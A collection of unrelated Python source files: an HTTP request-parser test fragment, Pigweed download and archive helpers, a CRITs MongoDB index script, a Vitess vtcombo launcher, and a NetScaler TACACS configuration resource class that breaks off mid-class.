matchers = get_funs("match_")
cfgs = [
(mt, sz, sn)
for mt in matchers
for sz in sizers
for sn in senders
]
ret = []
for (mt, sz, sn) in cfgs:
if hasattr(mt, 'funcname'):
mtn = mt.func_name[6:]
szn = sz.func_name[5:]
snn = sn.func_name[5:]
else:
mtn = mt.__name__[6:]
szn = sz.__name__[5:]
snn = sn.__name__[5:]
def test_req(sn, sz, mt):
self.check(cfg, sn, sz, mt)
desc = "%s: MT: %s SZ: %s SN: %s" % (self.name, mtn, szn, snn)
test_req.description = desc
ret.append((test_req, sn, sz, mt))
return ret
def check(self, cfg, sender, sizer, matcher):
cases = self.expect[:]
p = RequestParser(cfg, sender())
for req in p:
self.same(req, sizer, matcher, cases.pop(0))
assert not cases
def same(self, req, sizer, matcher, exp):
assert req.method == exp["method"]
assert req.uri == exp["uri"]["raw"]
assert req.path == exp["uri"]["path"]
assert req.query == exp["uri"]["query"]
assert req.fragment == exp["uri"]["fragment"]
assert req.version == exp["version"]
assert req.headers == exp["headers"]
matcher(req, exp["body"], sizer)
assert req.trailers == exp.get("trailers", [])
class badrequest(object):
def __init__(self, fname):
self.fname = fname
self.name = os.path.basename(fname)
with open(self.fname) as handle:
self.data = handle.read()
self.data = self.data.replace("\n", "").replace("\\r\\n", "\r\n")
self.data = self.data.replace("\\0", "\000")
self.data = self.data.encode('latin1')
def send(self):
maxs = round(len(self.data) / 10)
read = 0
while read < len(self.data):
chunk = random.randint(1, maxs)
yield self.data[read:read+chunk]
read += chunk
def check(self, cfg):
p = RequestParser(cfg, self.send())
six.next(p)
|
|
#!/usr/bin/env python3
# Copyright 2020 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""File Helper Functions."""
import glob
import hashlib
import json
import logging
import os
import shutil
import sys
import subprocess
import tarfile
import urllib.request
import zipfile
from pathlib import Path
from typing import List
_LOG = logging.getLogger(__name__)
class InvalidChecksumError(Exception):
pass
def find_files(starting_dir: str,
patterns: List[str],
directories_only=False) -> List[str]:
original_working_dir = os.getcwd()
if not (os.path.exists(starting_dir) and os.path.isdir(starting_dir)):
raise FileNotFoundError(
"Directory '{}' does not exist.".format(starting_dir))
os.chdir(starting_dir)
files = []
for pattern in patterns:
for file_path in glob.glob(pattern, recursive=True):
if not directories_only or (directories_only
and os.path.isdir(file_path)):
files.append(file_path)
os.chdir(original_working_dir)
return sorted(files)
def sha256_sum(file_name):
hash_sha256 = hashlib.sha256()
with open(file_name, "rb") as file_handle:
for chunk in iter(lambda: file_handle.read(4096), b""):
hash_sha256.update(chunk)
return hash_sha256.hexdigest()
def md5_sum(file_name):
hash_md5 = hashlib.md5()
with open(file_name, "rb") as file_handle:
for chunk in iter(lambda: file_handle.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def verify_file_checksum(file_path,
expected_checksum,
sum_function=sha256_sum):
downloaded_checksum = sum_function(file_path)
if downloaded_checksum != expected_checksum:
raise InvalidChecksumError(
f"Invalid {sum_function.__name__}\n"
f"{downloaded_checksum} {os.path.basename(file_path)}\n"
f"{expected_checksum} (expected)\n\n"
"Please delete this file and try again:\n"
f"{file_path}")
_LOG.debug(" %s:", sum_function.__name__)
_LOG.debug(" %s %s", downloaded_checksum, os.path.basename(file_path))
return True
def relative_or_absolute_path(file_string: str):
"""Return a Path relative to os.getcwd(), else an absolute path."""
file_path = Path(file_string)
try:
return file_path.relative_to(os.getcwd())
except ValueError:
return file_path.resolve()
def download_to_cache(url: str,
expected_md5sum=None,
expected_sha256sum=None,
cache_directory=".cache",
downloaded_file_name=None) -> str:
cache_dir = os.path.realpath(
os.path.expanduser(os.path.expandvars(cache_directory)))
if not downloaded_file_name:
# Use the last part of the URL as the file name.
downloaded_file_name = url.split("/")[-1]
downloaded_file = os.path.join(cache_dir, downloaded_file_name)
if not os.path.exists(downloaded_file):
_LOG.info("Downloading: %s", url)
_LOG.info("Please wait...")
urllib.request.urlretrieve(url, filename=downloaded_file)
if os.path.exists(downloaded_file):
_LOG.info("Downloaded: %s", relative_or_absolute_path(downloaded_file))
if expected_sha256sum:
verify_file_checksum(downloaded_file,
expected_sha256sum,
sum_function=sha256_sum)
elif expected_md5sum:
verify_file_checksum(downloaded_file,
expected_md5sum,
sum_function=md5_sum)
return downloaded_file
def extract_zipfile(archive_file: str, dest_dir: str):
"""Extract a zipfile preseving permissions."""
destination_path = Path(dest_dir)
with zipfile.ZipFile(archive_file) as archive:
for info in archive.infolist():
archive.extract(info.filename, path=dest_dir)
permissions = info.external_attr >> 16
out_path = destination_path / info.filename
out_path.chmod(permissions)
def extract_tarfile(archive_file: str, dest_dir: str):
with tarfile.open(archive_file, 'r') as archive:
archive.extractall(path=dest_dir)
def extract_archive(archive_file: str,
dest_dir: str,
cache_dir: str,
remove_single_toplevel_folder=True):
"""Extract a tar or zip file.
Args:
archive_file (str): Absolute path to the archive file.
dest_dir (str): Extraction destination directory.
cache_dir (str): Directory where temp files can be created.
remove_single_toplevel_folder (bool): If the archive contains only a
single folder move the contents of that into the destination
directory.
"""
# Make a temporary directory to extract files into
temp_extract_dir = os.path.join(cache_dir,
"." + os.path.basename(archive_file))
os.makedirs(temp_extract_dir, exist_ok=True)
_LOG.info("Extracting: %s", relative_or_absolute_path(archive_file))
if zipfile.is_zipfile(archive_file):
extract_zipfile(archive_file, temp_extract_dir)
elif tarfile.is_tarfile(archive_file):
extract_tarfile(archive_file, temp_extract_dir)
else:
_LOG.error("Unknown archive format: %s", archive_file)
return sys.exit(1)
_LOG.info("Installing into: %s", relative_or_absolute_path(dest_dir))
path_to_extracted_files = temp_extract_dir
extracted_top_level_files = os.listdir(temp_extract_dir)
# Check if tarfile has only one folder
# If yes, make that the new path_to_extracted_files
if remove_single_toplevel_folder and len(extracted_top_level_files) == 1:
path_to_extracted_files = os.path.join(temp_extract_dir,
extracted_top_level_files[0])
# Move extracted files to dest_dir
extracted_files = os.listdir(path_to_extracted_files)
for file_name in extracted_files:
source_file = os.path.join(path_to_extracted_files, file_name)
dest_file = os.path.join(dest_dir, file_name)
shutil.move(source_file, dest_file)
# rm -rf temp_extract_dir
shutil.rmtree(temp_extract_dir, ignore_errors=True)
# Return List of extracted files
return list(Path(dest_dir).rglob("*"))
def remove_empty_directories(directory):
"""Recursively remove empty directories."""
for path in sorted(Path(directory).rglob("*"), reverse=True):
# If broken symlink
if path.is_symlink() and not path.exists():
path.unlink()
# if empty directory
elif path.is_dir() and len(os.listdir(path)) == 0:
path.rmdir()
def decode_file_json(file_name):
"""Decode JSON values from a file.
Does not raise an error if the file cannot be decoded."""
# Get absolute path to the file.
file_path = os.path.realpath(
os.path.expanduser(os.path.expandvars(file_name)))
json_file_options = {}
try:
with open(file_path, "r") as jfile:
json_file_options = json.loads(jfile.read())
except (FileNotFoundError, json.JSONDecodeError):
_LOG.warning("Unable to read file '%s'", file_path)
return json_file_options, file_path
def git_apply_patch(root_directory,
patch_file,
ignore_whitespace=True,
unsafe_paths=False):
"""Use `git apply` to apply a diff file."""
_LOG.info("Applying Patch: %s", patch_file)
git_apply_command = ["git", "apply"]
if ignore_whitespace:
git_apply_command.append("--ignore-whitespace")
if unsafe_paths:
git_apply_command.append("--unsafe-paths")
git_apply_command += ["--directory", root_directory, patch_file]
subprocess.run(git_apply_command)
|
|
import pymongo
from django.core.management.base import BaseCommand
from django.conf import settings
from optparse import make_option
from crits.core.mongo_tools import mongo_connector
class Command(BaseCommand):
"""
Script Class.
"""
option_list = BaseCommand.option_list + (
make_option('--remove-indexes',
'-r',
action='store_true',
dest='remove',
default=False,
help='Remove all indexes. Does NOT create.'),
)
help = 'Creates indexes for MongoDB.'
def handle(self, *args, **options):
"""
Script Execution.
"""
remove = options.get('remove')
if remove:
remove_indexes()
else:
create_indexes()
def remove_indexes():
"""
Removes all indexes from all collections.
"""
coll_list = [settings.COL_BACKDOORS,
settings.COL_BUCKET_LISTS,
settings.COL_CAMPAIGNS,
settings.COL_COMMENTS,
settings.COL_DOMAINS,
settings.COL_EMAIL,
settings.COL_EVENTS,
settings.COL_EXPLOITS,
settings.COL_INDICATORS,
settings.COL_IPS,
settings.COL_NOTIFICATIONS,
'%s.files' % settings.COL_OBJECTS,
'%s.chunks' % settings.COL_OBJECTS,
settings.COL_PCAPS,
'%s.files' % settings.COL_PCAPS,
'%s.chunks' % settings.COL_PCAPS,
settings.COL_SAMPLES,
'%s.files' % settings.COL_SAMPLES,
'%s.chunks' % settings.COL_SAMPLES,
settings.COL_TARGETS,
]
for coll in coll_list:
print "Removing index for: %s" % coll
c = mongo_connector(coll)
c.drop_indexes()
def create_indexes():
"""
Creates the default set of indexes for the system. Depending on your use
cases, as well as quantity of data, admins may wish to tweak these indexes
to best fit their requirements.
"""
print "Creating indexes (duplicates will be ignored automatically)"
analysis_results = mongo_connector(settings.COL_ANALYSIS_RESULTS)
analysis_results.ensure_index("service_name", background=True)
analysis_results.ensure_index("object_type", background=True)
analysis_results.ensure_index("object_id", background=True)
bucket_lists = mongo_connector(settings.COL_BUCKET_LISTS)
bucket_lists.ensure_index("name", background=True)
backdoors = mongo_connector(settings.COL_BACKDOORS)
backdoors.ensure_index("name", background=True)
campaigns = mongo_connector(settings.COL_CAMPAIGNS)
campaigns.ensure_index("objects.value", background=True)
campaigns.ensure_index("relationships.value", background=True)
campaigns.ensure_index("bucket_list", background=True)
comments = mongo_connector(settings.COL_COMMENTS)
comments.ensure_index("obj_id", background=True)
comments.ensure_index("users", background=True)
comments.ensure_index("tags", background=True)
comments.ensure_index("status", background=True)
domains = mongo_connector(settings.COL_DOMAINS)
domains.ensure_index("domain", background=True)
domains.ensure_index("objects.value", background=True)
domains.ensure_index("relationships.value", background=True)
domains.ensure_index("campaign.name", background=True)
domains.ensure_index("bucket_list", background=True)
emails = mongo_connector(settings.COL_EMAIL)
emails.ensure_index("objects.value", background=True)
emails.ensure_index("relationships.value", background=True)
emails.ensure_index("campaign.name", background=True)
emails.ensure_index("bucket_list", background=True)
events = mongo_connector(settings.COL_EVENTS)
events.ensure_index("objects.value", background=True)
events.ensure_index("relationships.value", background=True)
events.ensure_index("campaign.name", background=True)
events.ensure_index("bucket_list", background=True)
exploits = mongo_connector(settings.COL_EXPLOITS)
exploits.ensure_index("name", background=True)
indicators = mongo_connector(settings.COL_INDICATORS)
indicators.ensure_index("value", background=True)
indicators.ensure_index("objects.value", background=True)
indicators.ensure_index("relationships.value", background=True)
indicators.ensure_index("campaign.name", background=True)
indicators.ensure_index("bucket_list", background=True)
ips = mongo_connector(settings.COL_IPS)
ips.ensure_index("ip", background=True)
ips.ensure_index("objects.value", background=True)
ips.ensure_index("relationships.value", background=True)
ips.ensure_index("campaign.name", background=True)
ips.ensure_index("bucket_list", background=True)
if settings.FILE_DB == settings.GRIDFS:
objects_files = mongo_connector('%s.files' % settings.COL_OBJECTS)
objects_files.ensure_index("md5", background=True)
objects_chunks = mongo_connector('%s.chunks' % settings.COL_OBJECTS)
objects_chunks.ensure_index([("files_id",pymongo.ASCENDING),
("n", pymongo.ASCENDING)],
unique=True)
notifications = mongo_connector(settings.COL_NOTIFICATIONS)
notifications.ensure_index("obj_id", background=True)
# auto-expire notifications after 30 days
notifications.ensure_index("date", background=True,
expireAfterSeconds=2592000)
notifications.ensure_index("users", background=True)
pcaps = mongo_connector(settings.COL_PCAPS)
pcaps.ensure_index("md5", background=True)
pcaps.ensure_index("objects.value", background=True)
pcaps.ensure_index("relationships.value", background=True)
pcaps.ensure_index("campaign.name", background=True)
pcaps.ensure_index("bucket_list", background=True)
if settings.FILE_DB == settings.GRIDFS:
pcaps_files = mongo_connector('%s.files' % settings.COL_PCAPS)
pcaps_files.ensure_index("md5", background=True)
pcaps_chunks = mongo_connector('%s.chunks' % settings.COL_PCAPS)
pcaps_chunks.ensure_index([("files_id", pymongo.ASCENDING),
("n", pymongo.ASCENDING)],
unique=True)
raw_data = mongo_connector(settings.COL_RAW_DATA)
raw_data.ensure_index("link_id", background=True)
raw_data.ensure_index("md5", background=True)
raw_data.ensure_index("objects.value", background=True)
raw_data.ensure_index("relationships.value", background=True)
raw_data.ensure_index("campaign.name", background=True)
raw_data.ensure_index("bucket_list", background=True)
signature = mongo_connector(settings.COL_SIGNATURES)
signature.ensure_index("link_id", background=True)
signature.ensure_index("md5", background=True)
signature.ensure_index("objects.value", background=True)
signature.ensure_index("relationships.value", background=True)
signature.ensure_index("campaign.name", background=True)
signature.ensure_index("bucket_list", background=True)
samples = mongo_connector(settings.COL_SAMPLES)
samples.ensure_index("source.name", background=True)
samples.ensure_index("md5", background=True)
samples.ensure_index("sha1", background=True)
samples.ensure_index("sha256", background=True)
samples.ensure_index("ssdeep", background=True)
samples.ensure_index("mimetype", background=True)
samples.ensure_index("filetype", background=True)
samples.ensure_index("size", background=True)
samples.ensure_index("filename", background=True)
samples.ensure_index("objects.value", background=True)
samples.ensure_index("relationships.value", background=True)
samples.ensure_index("campaign.name", background=True)
samples.ensure_index("analysis.results.result", background=True)
samples.ensure_index("analysis.results.md5", background=True)
samples.ensure_index("bucket_list", background=True)
if settings.FILE_DB == settings.GRIDFS:
samples_files = mongo_connector('%s.files' % settings.COL_SAMPLES)
samples_files.ensure_index("md5", background=True)
samples_chunks = mongo_connector('%s.chunks' % settings.COL_SAMPLES)
samples_chunks.ensure_index([("files_id", pymongo.ASCENDING),
("n", pymongo.ASCENDING)],
unique=True)
screenshots = mongo_connector(settings.COL_SCREENSHOTS)
screenshots.ensure_index("tags", background=True)
targets = mongo_connector(settings.COL_TARGETS)
targets.ensure_index("objects.value", background=True)
targets.ensure_index("relationships.value", background=True)
targets.ensure_index("campaign.name", background=True)
targets.ensure_index("bucket_list", background=True)
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
"""Starts the vtcombo process."""
import json
import logging
import os
import socket
import subprocess
import time
import urllib
from vttest import environment
class ShardInfo(object):
"""Contains the description for setting up a test shard.
Every shard should have a unique db_name, since they're all stored in a single
MySQL instance for the purpose of this test.
"""
def __init__(self, keyspace, shard_name, db_name):
self.keyspace = keyspace
self.name = shard_name
self.db_name = db_name
class VtProcess(object):
"""Base class for a vt process, vtcombo only now."""
START_RETRIES = 5
def __init__(self, name, directory, binary, port_name):
self.name = name
self.directory = directory
self.binary = binary
self.extraparams = []
self.port_name = port_name
self.process = None
def wait_start(self):
"""Start the process and wait for it to respond on HTTP."""
for _ in xrange(0, self.START_RETRIES):
self.port = environment.get_port(self.port_name)
if environment.get_protocol() == 'grpc':
self.grpc_port = environment.get_port(self.port_name, protocol='grpc')
else:
self.grpc_port = None
logs_subdirectory = environment.get_logs_directory(self.directory)
cmd = [
self.binary,
'-port', '%u' % self.port,
'-log_dir', logs_subdirectory,
]
if environment.get_protocol() == 'grpc':
cmd.extend(['-grpc_port', '%u' % self.grpc_port])
cmd.extend(self.extraparams)
logging.info('Starting process: %s', cmd)
stdout = os.path.join(logs_subdirectory, '%s.%d.log' %
(self.name, self.port))
self.stdout = open(stdout, 'w')
self.process = subprocess.Popen(cmd,
stdout=self.stdout,
stderr=subprocess.STDOUT)
timeout = time.time() + 60.0
while time.time() < timeout:
if environment.process_is_healthy(
self.name, self.addr()) and self.get_vars():
logging.info('%s started.', self.name)
return
elif self.process.poll() is not None:
logging.error('%s process exited prematurely.', self.name)
break
time.sleep(0.3)
logging.error('cannot start %s process on time: %s ',
self.name, socket.getfqdn())
self.kill()
raise Exception('Failed %d times to run %s' % (
self.START_RETRIES,
self.name))
def addr(self):
"""Return the host:port of the process."""
return '%s:%u' % (socket.getfqdn(), self.port)
def grpc_addr(self):
"""Return the grpc host:port of the process.
Only call this is environment.get_protocol() == 'grpc'."""
return '%s:%u' % (socket.getfqdn(), self.grpc_port)
def get_vars(self):
"""Return the debug vars."""
data = None
try:
url = 'http://%s/debug/vars' % self.addr()
f = urllib.urlopen(url)
data = f.read()
f.close()
except IOError:
return None
try:
return json.loads(data)
except ValueError:
logging.error('%s', data)
raise
def kill(self):
"""Kill the process."""
# These will proceed without error even if the process is already gone.
self.process.terminate()
def wait(self):
"""Wait for the process to end."""
self.process.wait()
class VtcomboProcess(VtProcess):
"""Represents a vtcombo subprocess."""
QUERYSERVER_PARAMETERS = [
'-queryserver-config-pool-size', '4',
'-queryserver-config-query-timeout', '300',
'-queryserver-config-schema-reload-time', '60',
'-queryserver-config-stream-pool-size', '4',
'-queryserver-config-transaction-cap', '4',
'-queryserver-config-transaction-timeout', '300',
'-queryserver-config-txpool-timeout', '300',
]
def __init__(self, directory, shards, mysql_db, vschema, charset,
web_dir=None):
VtProcess.__init__(self, 'vtcombo-%s' % os.environ['USER'], directory,
environment.vtcombo_binary, port_name='vtcombo')
topology = ','.join(['%s/%s:%s' % (shard.keyspace, shard.name,
shard.db_name) for shard in shards])
self.extraparams = [
'-db-config-app-charset', charset,
'-db-config-app-uname', mysql_db.username(),
'-db-config-app-pass', mysql_db.password(),
'-topology', topology,
'-mycnf_server_id', '1',
'-mycnf_socket_file', mysql_db.unix_socket(),
] + self.QUERYSERVER_PARAMETERS + environment.extra_vtcombo_parameters()
if vschema:
self.extraparams.extend(['-vschema', vschema])
if web_dir:
self.extraparams.extend(['-web_dir', web_dir])
if mysql_db.unix_socket():
self.extraparams.extend(
['-db-config-app-unixsocket', mysql_db.unix_socket()])
else:
self.extraparams.extend(
['-db-config-app-host', mysql_db.hostname(),
'-db-config-app-port', str(mysql_db.port())])
vtcombo_process = None
def start_vt_processes(directory, shards, mysql_db, vschema,
charset='utf8', web_dir=None):
"""Start the vt processes.
Parameters:
directory: the toplevel directory for the processes (logs, ...)
shards: an array of ShardInfo objects.
mysql_db: an instance of the mysql_db.MySqlDB class.
charset: the character set for the database connections.
web_dir: contains the web app for vtctld side of vtcombo.
"""
global vtcombo_process
logging.info('start_vt_processes(directory=%s,vtcombo_binary=%s)',
directory, environment.vtcombo_binary)
vtcombo_process = VtcomboProcess(directory, shards, mysql_db, vschema,
charset, web_dir=web_dir)
vtcombo_process.wait_start()
def kill_vt_processes():
"""Call kill() on all processes."""
logging.info('kill_vt_processes()')
if vtcombo_process:
vtcombo_process.kill()
def wait_vt_processes():
"""Call wait() on all processes."""
logging.info('wait_vt_processes()')
if vtcombo_process:
vtcombo_process.wait()
def kill_and_wait_vt_processes():
"""Call kill() and then wait() on all processes."""
kill_vt_processes()
wait_vt_processes()
# wait_step is a helper for looping until a condition is true.
# use as follow:
# timeout = 10
# while True:
# if done:
# break
# timeout = utils.wait_step('condition', timeout)
def wait_step(msg, timeout, sleep_time=1.0):
timeout -= sleep_time
if timeout <= 0:
raise Exception("timeout waiting for condition '%s'" % msg)
logging.debug("Sleeping for %f seconds waiting for condition '%s'",
sleep_time, msg)
time.sleep(sleep_time)
return timeout
|
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class authenticationtacacsaction(base_resource) :
""" Configuration for TACACS action resource. """
def __init__(self) :
self._name = ""
self._serverip = ""
self._serverport = 0
self._authtimeout = 0
self._tacacssecret = ""
self._authorization = ""
self._accounting = ""
self._auditfailedcmds = ""
self._defaultauthenticationgroup = ""
self._success = 0
self._failure = 0
self.___count = 0
@property
def name(self) :
"""Name for the TACACS+ profile (action).
Must begin with a letter, number, or the underscore character (_), and must contain only letters, numbers, and the hyphen (-), period (.) pound (#), space ( ), at (@), equals (=), colon (:), and underscore characters. Cannot be changed after TACACS profile is created.
The following requirement applies only to the NetScaler CLI:
If the name includes one or more spaces, enclose the name in double or single quotation marks (for example, "my authentication action" or 'my authentication action').<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
"""Name for the TACACS+ profile (action).
Must begin with a letter, number, or the underscore character (_), and must contain only letters, numbers, and the hyphen (-), period (.) pound (#), space ( ), at (@), equals (=), colon (:), and underscore characters. Cannot be changed after TACACS profile is created.
The following requirement applies only to the NetScaler CLI:
If the name includes one or more spaces, enclose the name in double or single quotation marks (for example, "my authentication action" or 'my authentication action').<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def serverip(self) :
"""IP address assigned to the TACACS+ server.<br/>Minimum length = 1.
"""
try :
return self._serverip
except Exception as e:
raise e
@serverip.setter
def serverip(self, serverip) :
"""IP address assigned to the TACACS+ server.<br/>Minimum length = 1
"""
try :
self._serverip = serverip
except Exception as e:
raise e
@property
def serverport(self) :
"""Port number on which the TACACS+ server listens for connections.<br/>Default value: 49<br/>Minimum length = 1.
"""
try :
return self._serverport
except Exception as e:
raise e
@serverport.setter
def serverport(self, serverport) :
"""Port number on which the TACACS+ server listens for connections.<br/>Default value: 49<br/>Minimum length = 1
"""
try :
self._serverport = serverport
except Exception as e:
raise e
@property
def authtimeout(self) :
"""Number of seconds the NetScaler appliance waits for a response from the TACACS+ server.<br/>Default value: 3<br/>Minimum length = 1.
"""
try :
return self._authtimeout
except Exception as e:
raise e
@authtimeout.setter
def authtimeout(self, authtimeout) :
"""Number of seconds the NetScaler appliance waits for a response from the TACACS+ server.<br/>Default value: 3<br/>Minimum length = 1
"""
try :
self._authtimeout = authtimeout
except Exception as e:
raise e
@property
def tacacssecret(self) :
"""Key shared between the TACACS+ server and the NetScaler appliance.
Required for allowing the NetScaler appliance to communicate with the TACACS+ server.<br/>Minimum length = 1.
"""
try :
return self._tacacssecret
except Exception as e:
raise e
@tacacssecret.setter
def tacacssecret(self, tacacssecret) :
"""Key shared between the TACACS+ server and the NetScaler appliance.
Required for allowing the NetScaler appliance to communicate with the TACACS+ server.<br/>Minimum length = 1
"""
try :
self._tacacssecret = tacacssecret
except Exception as e:
raise e
@property
def authorization(self) :
"""Use streaming authorization on the TACACS+ server.<br/>Possible values = ON, OFF.
"""
try :
return self._authorization
except Exception as e:
raise e
@authorization.setter
def authorization(self, authorization) :
"""Use streaming authorization on the TACACS+ server.<br/>Possible values = ON, OFF
"""
try :
self._authorization = authorization
except Exception as e:
raise e
@property
def accounting(self) :
"""Whether the TACACS+ server is currently accepting accounting messages.<br/>Possible values = ON, OFF.
"""
try :
return self._accounting
except Exception as e:
raise e
@accounting.setter
def accounting(self, accounting) :
"""Whether the TACACS+ server is currently accepting accounting messages.<br/>Possible values = ON, OFF
"""
try :
self._accounting = accounting
except Exception as e:
raise e
@property
def auditfailedcmds(self) :
"""The state of the TACACS+ server that will receive accounting messages.<br/>Possible values = ON, OFF.
"""
try :
return self._auditfailedcmds
except Exception as e:
raise e
@auditfailedcmds.setter
def auditfailedcmds(self, auditfailedcmds) :
"""The state of the TACACS+ server that will receive accounting messages.<br/>Possible values = ON, OFF
"""
try :
self._auditfailedcmds = auditfailedcmds
except Exception as e:
raise e
@property
def defaultauthenticationgroup(self) :
"""This is the default group that is chosen when the authentication succeeds in addition to extracted groups.<br/>Maximum length = 64.
"""
try :
return self._defaultauthenticationgroup
except Exception as e:
raise e
@defaultauthenticationgroup.setter
def defaultauthenticationgroup(self, defaultauthenticationgroup) :
"""This is the default group that is chosen when the authentication succeeds in addition to extracted groups.<br/>Maximum length = 64
"""
try :
self._defaultauthenticationgroup = defaultauthenticationgroup
except Exception as e:
raise e
@property
def success(self) :
try :
return self._success
except Exception as e:
raise e
@property
def failure(self) :
try :
return self._failure
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(authenticationtacacsaction_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.authenticationtacacsaction
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.name) :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
""" Use this API to add authenticationtacacsaction.
"""
try :
if type(resource) is not list :
addresource = authenticationtacacsaction()
addresource.name = resource.name
addresource.serverip = resource.serverip
addresource.serverport = resource.serverport
addresource.authtimeout = resource.authtimeout
addresource.tacacssecret = resource.tacacssecret
addresource.authorization = resource.authorization
addresource.accounting = resource.accounting
addresource.auditfailedcmds = resource.auditfailedcmds
addresource.defaultauthenticationgroup = resource.defaultauthenticationgroup
return addresource.add_resource(client)
else :
if (resource and len(resource) > 0) :
addresources = [ authenticationtacacsaction() for _ in range(len(resource))]
for i in range(len(resource)) :
addresources[i].name = resource[i].name
addresources[i].serverip = resource[i].serverip
addresources[i].serverport = resource[i].serverport
addresources[i].authtimeout = resource[i].authtimeout
addresources[i].tacacssecret = resource[i].tacacssecret
addresources[i].authorization = resource[i].authorization
addresources[i].accounting = resource[i].accounting
addresources[i].auditfailedcmds = resource[i].auditfailedcmds
addresources[i].defaultauthenticationgroup = resource[i].defaultauthenticationgroup
result = cls.add_bulk_request(client, addresources)
return result
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
""" Use this API to delete authenticationtacacsaction.
"""
try :
if type(resource) is not list :
deleteresource = authenticationtacacsaction()
if type(resource) != type(deleteresource):
deleteresource.name = resource
else :
deleteresource.name = resource.name
return deleteresource.delete_resource(client)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
deleteresources = [ authenticationtacacsaction() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i]
else :
if (resource and len(resource) > 0) :
deleteresources = [ authenticationtacacsaction() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i].name
result = cls.delete_bulk_request(client, deleteresources)
return result
except Exception as e :
raise e
@classmethod
def update(cls, client, resource) :
""" Use this API to update authenticationtacacsaction.
"""
try :
if type(resource) is not list :
updateresource = authenticationtacacsaction()
updateresource.name = resource.name
updateresource.serverip = resource.serverip
updateresource.serverport = resource.serverport
updateresource.authtimeout = resource.authtimeout
updateresource.tacacssecret = resource.tacacssecret
updateresource.authorization = resource.authorization
updateresource.accounting = resource.accounting
updateresource.auditfailedcmds = resource.auditfailedcmds
updateresource.defaultauthenticationgroup = resource.defaultauthenticationgroup
return updateresource.update_resource(client)
else :
if (resource and len(resource) > 0) :
updateresources = [ authenticationtacacsaction() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].name = resource[i].name
updateresources[i].serverip = resource[i].serverip
updateresources[i].serverport = resource[i].serverport
updateresources[i].authtimeout = resource[i].authtimeout
updateresources[i].tacacssecret = resource[i].tacacssecret
updateresources[i].authorization = resource[i].authorization
updateresources[i].accounting = resource[i].accounting
updateresources[i].auditfailedcmds = resource[i].auditfailedcmds
updateresources[i].defaultauthenticationgroup = resource[i].defaultauthenticationgroup
result = cls.update_bulk_request(client, updateresources)
return result
except Exception as e :
raise e
@classmethod
def unset(cls, client, resource, args) :
""" Use this API to unset the properties of authenticationtacacsaction resource.
Properties that need to be unset are specified in args array.
"""
try :
if type(resource) is not list :
unsetresource = authenticationtacacsaction()
if type(resource) != type(unsetresource):
unsetresource.name = resource
else :
unsetresource.name = resource.name
return unsetresource.unset_resource(client, args)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
unsetresources = [ authenticationtacacsaction() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].name = resource[i]
else :
if (resource and len(resource) > 0) :
unsetresources = [ authenticationtacacsaction() for _ in range(len(resource))]
for i in range(len(resource)) :
unsetresources[i].name = resource[i].name
result = cls.unset_bulk_request(client, unsetresources, args)
return result
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
""" Use this API to fetch all the authenticationtacacsaction resources that are configured on netscaler.
"""
try :
if not name :
obj = authenticationtacacsaction()
response = obj.get_resources(client, option_)
else :
if type(name) != cls :
if type(name) is not list :
obj = authenticationtacacsaction()
obj.name = name
response = obj.get_resource(client, option_)
else :
if name and len(name) > 0 :
response = [authenticationtacacsaction() for _ in range(len(name))]
obj = [authenticationtacacsaction() for _ in range(len(name))]
for i in range(len(name)) :
obj[i] = authenticationtacacsaction()
obj[i].name = name[i]
response[i] = obj[i].get_resource(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
""" Use this API to fetch filtered set of authenticationtacacsaction resources.
filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = authenticationtacacsaction()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
@classmethod
def count(cls, client) :
""" Use this API to count the authenticationtacacsaction resources configured on NetScaler.
"""
try :
obj = authenticationtacacsaction()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
